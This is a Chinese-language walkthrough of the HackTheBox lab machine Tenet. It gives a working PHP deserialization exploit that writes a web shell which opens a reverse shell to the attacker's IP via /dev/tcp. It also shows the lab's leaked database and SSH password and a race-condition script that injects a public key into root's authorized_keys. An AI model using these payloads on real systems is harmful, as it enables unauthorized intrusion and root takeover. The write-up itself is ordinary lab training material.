基本信息

端口扫描

常规22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ nmap -sC -sV 10.10.10.223
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-18 10:48 CST
Nmap scan report for 10.10.10.223
Host is up (0.074s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
|   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.02 seconds

80

直接ip访问是apache默认页面,把tenet.htb加hosts:

是一个wordpress,在一个评论里提示sator php backup,这是子域名,同样加hosts:

1
10.10.10.223 tenet.htb sator.tenet.htb

##sator.tenet.htb

直接访问是apache默认页面,根据前面的提示信息,很容易得到bak文件备份:

php 反序列化

查看sator代码,很明显是php反序列化:

exploit

那就是直接利用反序列化写php文件,触发reverse shell:

1
2
3
php exp.php

python3 -c 'import pty;pty.spawn("/bin/bash")'

exp.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
<?php
class DatabaseExport
{
        public $user_file = 'test.php';
        public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.11/4445 0>&1\'"); ?>';

        public function __destruct()
        {
                file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                echo '[] Database updated';
        }
}

$url = 'http://10.10.10.223/sator.php?arepo=' . urlencode(serialize(new DatabaseExport));
$response = file_get_contents("$url");
$response = file_get_contents("http://10.10.10.223/test.php");

?>

信息搜集

然后就在wordpress/wp-config.php里得到mysql用户名密码:

1
2
3
4
5
/** MySQL database username */
define( 'DB_USER', 'neil' );

/** MySQL database password */
define( 'DB_PASSWORD', 'Opera2112' );

这也就直接是ssh用户名密码

user flag

直接ssh登录,读取user.txt:

提权信息

sudo -l可以看到当前用户可以sudo运行/usr/local/bin/enableSSH.sh:

查看这个文件,里面addkey就是把/tmp/ssh-XXXXXXXX复制写入到/root/.ssh/authorized_keys,那么可以考虑做条件竞争,把我们自己的公钥写到/tmp/ssh-XXXXXXXX,从而使其复制写入到/root/.ssh/authorized_keys:

条件竞争 && root flag

就是两个脚本,一个写入公钥到tmp,一个sudo调用enableSSH.sh,竞争成功即可root登录,得到root.txt:

add_rsa.sh

1
2
3
4
while true
do
echo "ssh-rsa key" | tee /tmp/ssh-*
done

1.sh

1
2
3
4
while true
do
sudo /usr/local/bin/enableSSH.sh
done

参考资料